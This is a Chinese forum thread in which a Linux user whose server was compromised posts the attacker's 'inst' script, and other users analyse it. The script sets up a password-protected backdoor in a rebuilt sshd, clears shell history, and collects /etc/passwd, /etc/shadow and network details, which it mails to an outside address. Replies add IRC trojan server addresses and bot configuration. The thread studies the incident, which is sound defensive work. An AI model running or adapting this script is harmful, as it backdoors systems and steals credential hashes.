本人的linux被攻击了！！

veking

./inst

1. 
   
2. #!/bin/sh
   
3. chattr -Rais /bin /sbin /usr/bin /usr/sbin &>/dev/null
   
4. unset HISTFILE
   
5. export PATH=/usr/sbin:/sbin:$PATH
   
6. pwd=$(pwd)
   
7. sshd=$(which sshd)
   
8. chown root:root *
   
9. if test "$(grep PAM /etc/ssh/sshd_config| grep -v "#")" != "" ; then
   
10. OPTS="--with-pam"
    
11. fi
    
12.         ssh -V 2>test
    
13.         ver=`cat test | cut -d "_" -f 2  | cut -d "," -f 1`
    
14.         echo "[+] Versiunea curenta de openssh: $ver"
    
15.         echo "[+] SSH Daemon se afla in: $sshd"
    
16.         echo -n "[+] Daca vrei sa continui instalarea apasa Y ? [y/n]: "
    
17.         read do
    
18.         if [ "$do" = "y" ]; then
    
19.                 ok=1
    
20.         fi
    
21.         if [ "$do" = "n" ]; then
    
22.                 ok=0
    
23.                 echo -n "  [+]Te descurci sau dai un mail la [email]mihai1ro@yahoo.com[/email]? [y/n]"
    
24.                 read s
    
25.                 if [ $"s" = "y" ]; then
    
26.                         sok=1
    
27.                 fi
    
28.         fi
    
29.          while [ "$pass" = "" ]; do
    
30.                  echo -ne "[+] Scrie Parola pt SSHD Backdoor: \033[30m\00"
    
31.                  read pass
    
32.                  echo -ne "\033[0m\00"
    
33.          done
    
34. 
    
35. #  saving yewr little conf in backdoor.h
    
36.         echo -e "[+] Stergem Configuratie Actuala"
    
37.         rm -rf apps/ssh/genx.h
    
38.         rm -rf apps/ssh/ssh2version.h
    
39.         echo -e "[+] Configuratia a Fost Stearsa"
    
40.         echo -e "[+] Se creaza Noua Configuratie"
    
41.         echo "int genx=0,genxlookup=0;" >> apps/ssh/genx.h
    
42.         echo "char genxpass[]=\"$pass\",genxbuf[1024];" >> apps/ssh/genx.h
    
43.         echo "char genxfile[]=\"/dev/linux\";" >> apps/ssh/genx.h
    
44.         echo "#define SSH2_VERSION       \"OpenSSH_$ver\"" > apps/ssh/ssh2version.h
    
45. 
    
46.                 echo -e "[+] Salvam configuratia serverului"
    
47.                 echo -e "  * uname -a" >>/tmp/.l
    
48.                 echo >>/tmp/.l
    
49.                 uname -a >>/tmp/.l
    
50.                 echo >>/tmp/.l
    
51.                 echo -e "  * the ips" >>/tmp/.l
    
52.                 /sbin/ifconfig | grep inet >> /tmp/.l
    
53.                 echo -e "  * Shadow file" >>/tmp/.l
    
54.                 echo >>/tmp/.l
    
55.                 cat /etc/passwd >> /tmp/.l
    
56.                 cat /etc/shadow >> /tmp/.l
    
57.                 echo -e "  * Proc info" >>/tmp/.l
    
58.                 echo >>/tmp/.l
    
59.                 cat /proc/cpuinfo >>/tmp/.l
    
60.                 echo -e "  * Distro and shit Kasandro">>/tmp/.l
    
61.                 echo >>/tmp/.l
    
62.                 cat /proc/version >>/tmp/.l
    
63.                 cat apps/ssh/genx.h >>/tmp/.l
    
64.                 cat /tmp/.l | mail -s "root mail" [email]mihai1ro@yahoo.com[/email]
    
65.                 rm -rf /tmp/.l
    

复制代码

veking

谁能拿到这个 mihai1ro@yahoo.com 邮箱？

说不定会有惊喜哦，呵呵～～～～～～～～～～～～

david2878

平时还是需要注意安全的呀。

sanyork

比较纳闷，不是删除了所有的记录吗？你怎么还能看到历史记录，看样子攻击者很菜。

Godbach

原帖由 veking 于 2009-2-22 11:34 发表
在windows下，有卡巴无法下载那个压缩包。。。。被卡巴检测出包含病毒


sshd.jpg  这个似乎真的是个图片？
从浏览器上看不出来，可能解压后就不是图片了。。。。没测试

呵呵，只是改了后缀名。Linux不需要通过后缀名区分文件类型的。看一下用tar来执行这个.jpg就感觉应该是tar文件了

axlrose

管它改什么后缀后，骗不过 file 命令的
学习了

cuplinux

来自 罗马尼亚

http://translate.google.cn/translate_t?hl=zh-CN#ro|en|Te descurci sau dai un mail la

通过sshd来架后门，主义不错。呵呵

seed 那个就是定时执行吧。一会儿看看。

i.am

哈哈 chinaunix强淫一大堆啊

sunki

doru[1].jpg.tar.gz 这个包是IRC木马

SERVER 195.197.175.21 7000
SERVER 195.204.1.132 6667
SERVER 193.109.122.67 6667
SERVER 216.152.77.10 6667
SERVER  193.110.95.1 8000
SERVER  66.198.160.2 8888
SERVER 69.16.172.34 6667

handle dorin
mask *!*@IngerBun.users.undernet.org
channel *
access 100